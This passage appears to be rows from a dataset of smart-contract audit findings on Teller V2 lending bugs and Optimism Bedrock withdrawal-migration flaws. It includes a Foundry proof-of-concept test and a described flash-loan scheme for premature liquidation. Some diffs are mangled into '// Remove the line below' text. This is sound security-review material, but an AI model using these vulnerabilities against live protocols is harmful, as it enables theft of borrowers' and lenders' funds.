uint256(_bid.loanDetails.loanDuration)\\n 96: ) -\\n 97: (int256(_timestamp) -\\n 98: int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n 99: bool isLastPaymentCycle = durationLeftOnLoan <\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n owedPrincipal_ + interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n```\\n\\nSimplified the first calculation says `timeleft = loanDuration - (now - acceptedTimestamp)` and then if `timeleft < paymentCycle` we are within the 
last payment cycle.\\nThis isn't true for loan durations that aren't multiples of the payment cycles. This code says the last payment cycle is when you are one payment cycle from the end of the loan. Which is not the same as last payment cycle as my example above shows.\\nPoC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport { UpgradeableBeacon } from ""@openzeppelin/contracts/proxy/beacon/UpgradeableBeacon.sol"";\\n\\nimport { AddressUpgradeable } from ""@openzeppelin/contracts-upgradeable/utils/AddressUpgradeable.sol"";\\n\\nimport { TellerV2 } from ""../contracts/TellerV2.sol"";\\nimport { Payment } from ""../contracts/TellerV2Storage.sol"";\\nimport { CollateralManager } from ""../contracts/CollateralManager.sol"";\\nimport { LenderCommitmentForwarder } from ""../contracts/LenderCommitmentForwarder.sol"";\\nimport { CollateralEscrowV1 } from ""../contracts/escrow/CollateralEscrowV1.sol"";\\nimport { Collateral, CollateralType } from ""../contracts/interfaces/escrow/ICollateralEscrowV1.sol"";\\n\\nimport { ReputationManagerMock } from ""../contracts/mock/ReputationManagerMock.sol"";\\nimport { LenderManagerMock } from ""../contracts/mock/LenderManagerMock.sol"";\\nimport { MarketRegistryMock } from ""../contracts/mock/MarketRegistryMock.sol"";\\n\\nimport {TestERC20Token} from ""./tokens/TestERC20Token.sol"";\\n\\nimport ""lib/forge-std/src/Test.sol"";\\n\\ncontract LoansTest is Test {\\n using AddressUpgradeable for address;\\n\\n MarketRegistryMock marketRegistry;\\n\\n TellerV2 tellerV2;\\n LenderCommitmentForwarder lenderCommitmentForwarder;\\n CollateralManager collateralManager;\\n \\n TestERC20Token principalToken;\\n\\n address alice = address(0x1111);\\n\\n uint256 marketId = 0;\\n\\n function setUp() public {\\n tellerV2 = new TellerV2(address(0));\\n\\n marketRegistry = new MarketRegistryMock();\\n\\n lenderCommitmentForwarder = new LenderCommitmentForwarder(address(tellerV2),address(marketRegistry));\\n \\n 
collateralManager = new CollateralManager();\\n collateralManager.initialize(address(new UpgradeableBeacon(address(new CollateralEscrowV1()))), address(tellerV2));\\n\\n address rm = address(new ReputationManagerMock());\\n address lm = address(new LenderManagerMock());\\n tellerV2.initialize(0, address(marketRegistry), rm, address(lenderCommitmentForwarder), address(collateralManager), lm);\\n\\n marketRegistry.setMarketOwner(address(this));\\n marketRegistry.setMarketFeeRecipient(address(this));\\n\\n tellerV2.setTrustedMarketForwarder(marketId,address(lenderCommitmentForwarder));\\n\\n principalToken = new TestERC20Token(""Principal Token"", ""PRIN"", 12e18, 18);\\n }\\n\\n\\n function testLoanInstallmentsCalculatedIncorrectly() public {\\n // payment cycle is 1000 in market registry\\n \\n uint256 amount = 1000;\\n principalToken.transfer(alice,amount);\\n \\n vm.startPrank(alice);\\n principalToken.approve(address(tellerV2),2*amount);\\n uint256 bidId = tellerV2.submitBid(\\n address(principalToken),\\n marketId,\\n amount,\\n 2500, // 2.5 payment cycles\\n 0, // 0 interest to make calculations easier\\n """",\\n alice\\n );\\n tellerV2.lenderAcceptBid(bidId);\\n vm.stopPrank();\\n\\n // jump to first payment cycle end\\n vm.warp(block.timestamp + 1000);\\n Payment memory p = tellerV2.calculateAmountDue(bidId);\\n assertEq(400,p.principal);\\n\\n // borrower pays on time\\n vm.prank(alice);\\n tellerV2.repayLoanMinimum(bidId);\\n\\n // jump to second payment cycle\\n vm.warp(block.timestamp + 1000);\\n p = tellerV2.calculateAmountDue(bidId);\\n\\n // should be 400 but is full loan\\n assertEq(600,p.principal);\\n }\\n}\\n```\\n\\nThe details of this finding are out of scope but since it makes `TellerV2`, in scope, behave unexpectedly I believe this finding to be in scope.","First I thought that you could remove the `lastPaymentCycle` calculation all together. 
I tried that and then also tested what happened with ""irregular"" loans with interest.\\nThen I found this in the EMI calculation:\\n```\\nFile: libraries/NumbersLib.sol\\n\\n uint256 n = Math.ceilDiv(loanDuration, cycleDuration);\\n```\\n\\nEMI, which is designed for mortgages, assumes the payments is a discrete number of the same amortization essentially. I.e they don't allow ""partial"" periods at the end, because that doesn't make sense for a mortgage.\\nIn Teller this is allowed which causes some issues with the EMI calculation since the above row will always round up to a full number of payment periods. If you also count interest, which triggers the EMI calculation: The lender, in an ""irregular"" loan duration, would get less per installment up to the last one which would be bigger. The funds would all be paid with the correct interest in the end just not in the expected amounts.\\nMy recommendation now is:\\neither\\ndon't allow loan durations that aren't a multiple of the period, at least warn about it UI-wise, no one will lose any money but the installments might be split in unexpected amounts.\\nDo away with EMI all together as DeFi loans aren't the same as mortgages. The defaulting/liquidation logic only cares about time since last payment.\\nDo more math to make EMI work with irregular loan durations. This nerd sniped me:\\nMore math:\\nIn the middle we have an equation which describes the owed amount at a time $P_n$:\\n$$P_n=Pt^n-E\\frac{(t^n-1)}{t-1}$$ where $t=1+r$ and $r$ is the monthly interest rate ($apy*C/year$).\\nNow, from here, we want to calculate the loan at a time $P_{n + \\Delta}$:\\n$$P_{n + \\Delta}=Pt^nt_\\Delta-E\\frac{t^n-1}{t-1}t_\\Delta-kE$$\\nWhere $k$ is $c/C$ i.e. 
the ratio of partial cycle compared to a full cycle.\\nSame with $t_\\Delta$ which is $1+r_\\Delta$, ($r_\\Delta$ is also equal to $kr$, ratio of partial cycle rate to full cycle rate, which we'll use later).\\nReorganize to get $E$ from above:\\n$$ E = P r \\frac{t^nt_\\Delta}{t_\\Delta \\frac{t^n-1}{t-1} + k} $$\\nNow substitute in $1+r$ in place of $t$ and $1+r_\\Delta$ instead of $t_\\Delta$ and multiply both numerator and denominator with $r$:\\n$$ E = P \\frac{r (1+r)^n(1+r_\\Delta)}{(1+r_\\Delta)((1+r)^n - 1) + kr} $$\\nand $kr = r_\\Delta$ gives us:\\n$$ E = P r (1+r)^n \\frac{(1+r_\\Delta)}{(1+r_\\Delta)((1+r)^n - 1) + r_\\Delta} $$\\nTo check that this is correct, $r_\\Delta = 0$ (no extra cycle added) should give us the regular EMI equation. Which we can see is true for the above. And $r_\\Delta = r$ (a full extra cycle added) should give us the EMI equation but with $n+1$ which we can also see it does.\\nHere are the code changes to use this, together with changes to `V2Calculations.sol` to calculate the last period correctly:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\nindex 1cce8da..1ad5bcf 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\n@@ // Remove the line below\\n90,30 // Add the line below\\n90,15 @@ library V2Calculations {\\n uint256 owedTime = _timestamp // Remove the line below\\n 
uint256(_lastRepaidTimestamp);\\n interest_ = (interestOwedInAYear * owedTime) / daysInYear;\\n \\n// Remove the line below\\n // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n// Remove the line below\\n int256 durationLeftOnLoan = int256(\\n// Remove the line below\\n uint256(_bid.loanDetails.loanDuration)\\n// Remove the line below\\n ) // Remove the line below\\n\\n// Remove the line below\\n (int256(_timestamp) // Remove the line below\\n\\n// Remove the line below\\n int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n// Remove the line below\\n bool isLastPaymentCycle = durationLeftOnLoan <\\n// Remove the line below\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n// Remove the line below\\n owedPrincipal_ // Add the line below\\n interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n// Remove the line below\\n\\n if (_bid.paymentType == PaymentType.Bullet) {\\n// Remove the line below\\n if (isLastPaymentCycle) {\\n// Remove the line below\\n duePrincipal_ = owedPrincipal_;\\n// Remove the line below\\n }\\n// Add the line below\\n duePrincipal_ = owedPrincipal_;\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n// Remove the line below\\n uint256 maxCycleOwed = isLastPaymentCycle\\n// Remove the line below\\n ? 
owedPrincipal_ // Add the line below\\n interest_\\n// Remove the line below\\n : _bid.terms.paymentCycleAmount;\\n \\n // Calculate accrued amount due since last repayment\\n// Remove the line below\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n// Add the line below\\n uint256 owedAmount = (_bid.terms.paymentCycleAmount * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount // Remove the line below\\n interest_, owedPrincipal_);\\n }\\n```\\n\\nAnd then NumbersLib.sol:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\nindex f34dd9c..8ca48bc 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\n@@ // Remove the line below\\n120,7 // Add the line below\\n120,8 @@ library NumbersLib {\\n );\\n \\n // Number of payment cycles for the duration of the loan\\n// Remove the line below\\n uint256 n = Math.ceilDiv(loanDuration, cycleDuration);\\n// Add the line below\\n uint256 n = loanDuration/ cycleDuration;\\n// Add the line below\\n uint256 rest = loanDuration%cycleDuration;\\n \\n uint256 one = WadRayMath.wad();\\n uint256 r = WadRayMath.pctToWad(apr).wadMul(cycleDuration).wadDiv(\\n@@ // Remove the line below\\n128,8 // Add the line below\\n129,16 @@ library NumbersLib {\\n );\\n uint256 exp = (one // Add the line below\\n r).wadPow(n);\\n uint256 numerator = principal.wadMul(r).wadMul(exp);\\n// 
Remove the line below\\n uint256 denominator = exp // Remove the line below\\n one;\\n \\n// Remove the line below\\n return numerator.wadDiv(denominator);\\n// Add the line below\\n if(rest==0) {\\n// Add the line below\\n // duration is multiple of cycle\\n// Add the line below\\n uint256 denominator = exp // Remove the line below\\n one;\\n// Add the line below\\n return numerator.wadDiv(denominator);\\n// Add the line below\\n }\\n// Add the line below\\n // duration is an uneven cycle\\n// Add the line below\\n uint256 rDelta = WadRayMath.pctToWad(apr).wadMul(rest).wadDiv(daysInYear);\\n// Add the line below\\n uint256 n1 = numerator.wadMul(one // Add the line below\\n rDelta);\\n// Add the line below\\n uint256 denom = ((one // Add the line below\\n rDelta).wadMul(exp // Remove the line below\\n one)) // Add the line below\\n rDelta;\\n// Add the line below\\n return n1.wadDiv(denom);\\n }\\n }\\n```\\n",A borrower taking a loan might not be able to pay the last payment cycle and be liquidated. At the worst possible time since they've paid the whole loan on schedule up to the last installment. The liquidator just need to pay the last installment to take the whole collateral.\\nThis requires the loan to not be a multiple of the payment cycle which might sound odd. 
But since a year is 365 days and a common payment cycle is 30 days I imagine there can be quite a lot of loans that after 360 days will end up in this issue.\\nThere is also nothing stopping an unknowing borrower from placing a bid or accepting a commitment with an odd duration.,```\\nFile: libraries/V2Calculations.sol\\n\\n 93: // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n 94: int256 durationLeftOnLoan = int256(\\n 95: uint256(_bid.loanDetails.loanDuration)\\n 96: ) -\\n 97: (int256(_timestamp) -\\n 98: int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n 99: bool isLastPaymentCycle = durationLeftOnLoan <\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n owedPrincipal_ + interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n```\\n +setLenderManager may cause some Lenders to lose their assets,medium,"If the contract's lenderManager changes, repaid assets will be sent to the old lenderManager\\nsetLenderManager is used to change the lenderManager address of the contract\\n```\\n function setLenderManager(address _lenderManager)\\n external\\n reinitializer(8)\\n onlyOwner\\n {\\n _setLenderManager(_lenderManager);\\n }\\n\\n function _setLenderManager(address _lenderManager)\\n internal\\n onlyInitializing\\n {\\n require(\\n _lenderManager.isContract(),\\n ""LenderManager must be a contract""\\n );\\n lenderManager = ILenderManager(_lenderManager);\\n }\\n```\\n\\nclaimLoanNFT will change the bid.lender to the current lenderManager\\n```\\n function claimLoanNFT(uint256 _bidId)\\n external\\n acceptedLoan(_bidId, ""claimLoanNFT"")\\n whenNotPaused\\n {\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n require(sender == bid.lender, ""only lender can claim NFT"");\\n // mint an NFT with the lender manager\\n 
lenderManager.registerLoan(_bidId, sender);\\n // set lender address to the lender manager so we know to check the owner of the NFT for the true lender\\n bid.lender = address(lenderManager);\\n }\\n```\\n\\nIn getLoanLender, if the bid.lender is the current lenderManager, the owner of the NFT will be returned as the lender, and the repaid assets will be sent to the lender.\\n```\\n function getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n if (lender_ == address(lenderManager)) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n// rest of code\\n address lender = getLoanLender(_bidId);\\n\\n // Send payment to the lender\\n bid.loanDetails.lendingToken.safeTransferFrom(\\n _msgSenderForMarket(bid.marketplaceId),\\n lender,\\n paymentAmount\\n );\\n```\\n\\nIf setLenderManager is called to change the lenderManager, in getLoanLender, since the bid.lender is not the current lenderManager, the old lenderManager address will be returned as the lender, and the repaid assets will be sent to the old lenderManager, resulting in the loss of the lender's assets","Consider using MAGIC_NUMBER as bid.lender in claimLoanNFT and using that MAGIC_NUMBER in getLoanLender to do the comparison.\\n```\\n// Add the line below\\n address MAGIC_NUMBER = 0x// rest of code;\\n function claimLoanNFT(uint256 _bidId)\\n external\\n acceptedLoan(_bidId, ""claimLoanNFT"")\\n whenNotPaused\\n {\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n require(sender == bid.lender, ""only lender can claim NFT"");\\n // mint an NFT with the lender manager\\n lenderManager.registerLoan(_bidId, sender);\\n // set lender address to the lender manager so we know to check the owner of the NFT for the true lender\\n// Remove the line below\\n bid.lender = address(lenderManager);\\n// Add the line below\\n bid.lender = MAGIC_NUMBER;\\n }\\n// rest of code\\n function 
getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n// Remove the line below\\n if (lender_ == address(lenderManager)) {\\n// Add the line below\\n if (lender_ == MAGIC_NUMBER) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n```\\n",It may cause some Lenders to lose their assets,"```\\n function setLenderManager(address _lenderManager)\\n external\\n reinitializer(8)\\n onlyOwner\\n {\\n _setLenderManager(_lenderManager);\\n }\\n\\n function _setLenderManager(address _lenderManager)\\n internal\\n onlyInitializing\\n {\\n require(\\n _lenderManager.isContract(),\\n ""LenderManager must be a contract""\\n );\\n lenderManager = ILenderManager(_lenderManager);\\n }\\n```\\n" +A borrower/lender or liquidator will fail to withdraw the collateral assets due to reaching a gas limit,medium,"Within the TellerV2#submitBid(), there is no limitation that how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.\\nThis lead to some bad scenarios like this due to reaching gas limit:\\nA borrower or a lender fail to withdraw the collateral assets when the loan would not be liquidated.\\nA liquidator will fail to withdraw the collateral assets when the loan would be liquidated.\\n```\\nstruct Collateral {\\n CollateralType _collateralType;\\n uint256 _amount;\\n uint256 _tokenId;\\n address _collateralAddress;\\n}\\n```\\n\\n```\\n /**\\n * Since collateralInfo is mapped (address assetAddress => Collateral) that means\\n * that only a single tokenId per nft per loan can be collateralized.\\n * Ex. 
Two bored apes cannot be used as collateral for a single loan.\\n */\\n struct CollateralInfo {\\n EnumerableSetUpgradeable.AddressSet collateralAddresses;\\n mapping(address => Collateral) collateralInfo;\\n }\\n```\\n\\n```\\n // bidIds -> validated collateral info\\n mapping(uint256 => CollateralInfo) internal _bidCollaterals;\\n```\\n\\n```\\n function submitBid(\\n address _lendingToken,\\n uint256 _marketplaceId,\\n uint256 _principal,\\n uint32 _duration,\\n uint16 _APR,\\n string calldata _metadataURI,\\n address _receiver,\\n Collateral[] calldata _collateralInfo /// @audit\\n ) public override whenNotPaused returns (uint256 bidId_) {\\n // rest of code\\n bool validation = collateralManager.commitCollateral(\\n bidId_,\\n _collateralInfo /// @audit \\n );\\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Checks the validity of a borrower's multiple collateral balances and commits it to a bid.\\n * @param _bidId The id of the associated bid.\\n * @param _collateralInfo Additional information about the collateral assets.\\n * @return validation_ Boolean indicating if the collateral balances were validated.\\n */\\n function commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo /// @audit\\n ) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo);\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) { \\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info); /// @audit\\n }\\n }\\n }\\n```\\n\\n```\\n /**\\n * @notice Checks the validity of a borrower's collateral balance and commits it to a bid.\\n * @param _bidId The id of the associated bid.\\n * @param _collateralInfo Additional information about the collateral asset.\\n */\\n function _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n ) internal virtual {\\n CollateralInfo storage collateral = 
_bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; /// @audit\\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Withdraws deposited collateral from the created escrow of a bid that has been successfully repaid.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n */\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId)); /// @audit \\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); /// @audit \\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Sends the deposited collateral to a liquidator of a bid.\\n * @notice Can only be called by the protocol.\\n * @param _bidId The id of the liquidated bid.\\n * @param _liquidatorAddress The address of the liquidator to send the collateral to.\\n */\\n function liquidateCollateral(uint256 _bidId, address _liquidatorAddress)\\n external\\n onlyTellerV2\\n {\\n if (isBidCollateralBacked(_bidId)) {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n require(\\n bidState == BidState.LIQUIDATED,\\n ""Loan has not been liquidated""\\n );\\n _withdraw(_bidId, _liquidatorAddress); /// @audit\\n }\\n }\\n```\\n\\n```\\n /**\\n * @notice Withdraws collateral to a given receiver's address.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n * @param _receiver The address to withdraw the collateral to.\\n */\\n function _withdraw(uint256 _bidId, address _receiver) internal virtual {\\n for (\\n uint256 i;\\n i < _bidCollaterals[_bidId].collateralAddresses.length(); /// @audit\\n i++\\n ) {\\n // Get collateral info\\n Collateral storage collateralInfo = _bidCollaterals[_bidId]\\n .collateralInfo[\\n _bidCollaterals[_bidId].collateralAddresses.at(i)\\n ];\\n // Withdraw 
collateral from escrow and send it to bid lender\\n ICollateralEscrowV1(_escrows[_bidId]).withdraw( /// @audit\\n collateralInfo._collateralAddress,\\n collateralInfo._amount,\\n _receiver\\n );\\n```\\n\\nHowever, within the TellerV2#submitBid(), there is no limitation that how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.\\nThis lead to a bad scenario like below:\\n① A borrower assign too many number of the collateral assets (ERC20/ERC721/ERC1155) into the `_collateralInfo` array parameter when the borrower call the TellerV2#submitBid() to submit a bid.\\n② Then, a lender accepts the bid via calling the TellerV2#lenderAcceptBid()\\n③ Then, a borrower or a lender try to withdraw the collateral, which is not liquidated, by calling the CollateralManager#withdraw(). Or, a liquidator try to withdraw the collateral, which is liquidated, by calling the CollateralManager#liquidateCollateral()\\n④ But, the transaction of the CollateralManager#withdraw() or the CollateralManager#liquidateCollateral() will be reverted in the for-loop of the CollateralManager#_withdraw() because that transaction will reach a gas limit.","Within the TellerV2#submitBid(), consider adding a limitation about how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.","Due to reaching gas limit, some bad scenarios would occur like this:\\nA borrower or a lender fail to withdraw the collateral assets when the loan would not be liquidated.\\nA liquidator will fail to withdraw the collateral assets when the loan would be liquidated.",```\\nstruct Collateral {\\n CollateralType _collateralType;\\n uint256 _amount;\\n uint256 _tokenId;\\n address _collateralAddress;\\n}\\n```\\n +Premature Liquidation When a Borrower Pays early,medium,"On TellerV2 markets, whenever a borrower pays early in one payment cycle, they could be at risk to be liquidated in the next payment cycle. 
And this is due to a vulnerability in the liquidation logic implemented in `_canLiquidateLoan`. Note: This issue is submitted separately from issue #2 because the exploit is based on user behaviors regardless of a specific market setting. And the vulnerability might warrant a change in the liquidation logic.\\nIn TellerV2.sol, the sole liquidation logic is dependent on the time gap between now and the previous payment timestamp. But a user might decide to pay at any time within a given payment cycle, which makes the time gap unreliable and effectively renders this logic vulnerable to exploitation.\\n```\\n return (uint32(block.timestamp) -\\n _liquidationDelay -\\n lastRepaidTimestamp(_bidId) >\\n bidDefaultDuration[_bidId]);\\n```\\n\\nSuppose a scenario where a user takes on a loan on a market with 3 days payment cycle and 3 days paymentDefaultDuration. And the loan is 14 days in duration. The user decided to make the first minimal payment an hour after receiving the loan, and the next payment due date is after the sixth day. Now 5 days passed since the user made the first payment, and a liquidator comes in and liquidates the loan and claims the collateral before the second payment is due.\\nHere is a test to show proof of concept for this scenario.","Consider using the current timestamp - previous payment due date instead of just `lastRepaidTimestamp` in the liquidation check logic. Also, add the check to see whether a user is late on a payment in `_canLiquidateLoan`.","Given the fact that this vulnerability is not market specific and that users can pay freely during a payment cycle, it's quite easy for a liquidator to liquidate loans prematurely. And the effect might be across multiple markets.\\nWhen there are proportional collaterals, the exploit can be low cost. An attacker could take on flash loans to pay off the principal and interest, and the interest could be low when early in the loan duration. 
The attacker would then sell the collateral received in the same transaction to pay off flash loans and walk away with profits.",```\\n return (uint32(block.timestamp) -\\n _liquidationDelay -\\n lastRepaidTimestamp(_bidId) >\\n bidDefaultDuration[_bidId]);\\n```\\n +"All migrated withdrarwals that require more than 135,175 gas may be bricked",high,"Migrated withdrawals are given an ""outer"" (Portal) gas limit of `calldata cost + 200,000`, and an ""inner"" (CrossDomainMessenger) gas limit of `0`. The assumption is that the CrossDomainMessenger is replayable, so there is no need to specify a correct gas limit.\\nThis is an incorect assumption. For any withdrawals that require more than 135,175 gas, insufficient gas can be sent such that CrossDomainMessenger's external call reverts and the remaining 1/64th of the gas sent is not enough for replayability to be encoded in the Cross Domain Messenger.\\nHowever, the remaining 1/64th of gas in the Portal is sufficient to have the transaction finalize, so that the Portal will not process the withdrawal again.\\nWhen old withdrawals are migrated to Bedrock, they are encoded as calls to `L1CrossDomainMessenger.relayMessage()` as follows:\\n```\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(""cannot migrate withdrawal: %w"", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. 
Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.XDomainNonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n ""relayMessage"",\\n versionedNonce,\\n withdrawal.XDomainSender,\\n withdrawal.XDomainTarget,\\n value,\\n new(big.Int), // <= THIS IS THE INNER GAS LIMIT BEING SET TO ZERO\\n []byte(withdrawal.XDomainData),\\n )\\n if err != nil {\\n return nil, fmt.Errorf(""cannot abi encode relayMessage: %w"", err)\\n }\\n\\n gasLimit := MigrateWithdrawalGasLimit(data)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit), // <= THIS IS THE OUTER GAS LIMIT BEING SET\\n data,\\n )\\n return w, nil\\n}\\n```\\n\\nAs we can see, the `relayMessage()` call uses a gasLimit of zero (see comments above), while the outer gas limit is calculated by the `MigrateWithdrawalGasLimit()` function:\\n```\\nfunc MigrateWithdrawalGasLimit(data []byte) uint64 {\\n // Compute the cost of the calldata\\n dataCost := uint64(0)\\n for _, b := range data {\\n if b == 0 {\\n dataCost += params.TxDataZeroGas\\n } else {\\n dataCost += params.TxDataNonZeroGasEIP2028\\n }\\n }\\n\\n // Set the outer gas limit. This cannot be zero\\n gasLimit := dataCost + 200_000\\n // Cap the gas limit to be 25 million to prevent creating withdrawals\\n // that go over the block gas limit.\\n if gasLimit > 25_000_000 {\\n gasLimit = 25_000_000\\n }\\n\\n return gasLimit\\n}\\n```\\n\\nThis calculates the outer gas limit value by adding the calldata cost to 200,000.\\nLet's move over to the scenario in which these values are used to see why they can cause a problem.\\nWhen a transaction is proven, we can call `OptimismPortal.finalizeWithdrawalTransaction()` to execute the transaction. 
In the case of migrated withdrawals, this executes the following flow:\\n`OptimismPortal` calls to `L1CrossDomainMessenger` with a gas limit of `200,000 + calldata`\\nThis guarantees remaining gas for continued execution after the call of `(200_000 + calldata) * 64/63 * 1/64 > 3174`\\nXDM uses `41,002` gas before making the call, leaving `158,998` remaining for the call\\nThe `SafeCall.callWithMinGas()` succeeds, since the inner gas limit is set to 0\\nIf the call uses up all of the avaialble gas (succeeding or reverting), we are left with `158,998` * 1/64 = 2,484 for the remaining execution\\nThe remaining execution includes multiple SSTOREs which totals `23,823` gas, resulting in an OutOfGas revert\\nIn fact, if the call uses any amount greater than `135,175`, we will have less than `23,823` gas remaining and will revert\\nAs a result, none of the updates to `L1CrossDomainMessenger` occur, and the transaction is not marked in `failedMessages` for replayability\\nHowever, the remaining `3174` gas is sufficient to complete the transction on the `OptimismPortal`, which sets `finalizedWithdrawals[hash] = true` and locks the withdrawals from ever being made again","There doesn't seem to be an easy fix for this, except to adjust the migration process so that migrated withdrawals are directly saved as `failedMessages` on the `L1CrossDomainMessenger` (and marked as `finalizedWithdrawals` on the OptimismPortal), rather than needing to be reproven through the normal flow.","Any migrated withdrawal that uses more than `135,175` gas will be bricked if insufficient gas is sent. 
This could be done by a malicious attacker bricking thousands of pending withdrawals or, more likely, could happen to users who accidentally executed their withdrawal with too little gas and ended up losing it permanently.","```\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(""cannot migrate withdrawal: %w"", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.XDomainNonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n ""relayMessage"",\\n versionedNonce,\\n withdrawal.XDomainSender,\\n withdrawal.XDomainTarget,\\n value,\\n new(big.Int), // <= THIS IS THE INNER GAS LIMIT BEING SET TO ZERO\\n []byte(withdrawal.XDomainData),\\n )\\n if err != nil {\\n return nil, fmt.Errorf(""cannot abi encode relayMessage: %w"", err)\\n }\\n\\n gasLimit := MigrateWithdrawalGasLimit(data)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit), // <= THIS IS THE OUTER GAS LIMIT BEING SET\\n data,\\n )\\n return w, nil\\n}\\n```\\n" +"Legacy withdrawals can be relayed twice, causing double spending of bridged assets",high,"`L2CrossDomainMessenger.relayMessage` checks that legacy messages have not been relayed by reading from the `successfulMessages` state variable, however the contract's storage will wiped during the migration to Bedrock and `successfulMessages` will be empty after 
